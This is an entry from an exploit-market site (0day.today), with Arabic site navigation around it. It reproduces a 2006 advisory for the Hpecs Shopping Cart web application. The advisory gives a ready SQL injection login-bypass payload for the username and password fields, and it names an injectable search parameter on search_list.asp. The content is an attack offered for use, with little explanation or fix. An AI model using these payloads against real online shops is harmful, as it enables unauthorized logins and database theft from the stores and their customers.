[ authorization ] [ registration ] [ استعادة ]
اتصل بنا
يمكنكم الاتصال بنا من خلال:
0day.today Exploits Market and 0day Exploits Database

Hpecs Shopping Cart Remote Login Bypass Vulnerability

المؤلف
Security Access Point
الخطر
[
Security Risk Unsored
]
0day-ID
0day-ID-1167
الصنف
web applications
تاريخ الإضافة
14-11-2006
المنصة
unsorted
=====================================================
Hpecs Shopping Cart Remote Login Bypass Vulnerability
=====================================================



vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high


login bypass :
username:     'or''='
passwd:       'or''='

injection sql (post) :

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
 ( or just post your query in the search engine ... )




#  0day.today [2024-07-04]  #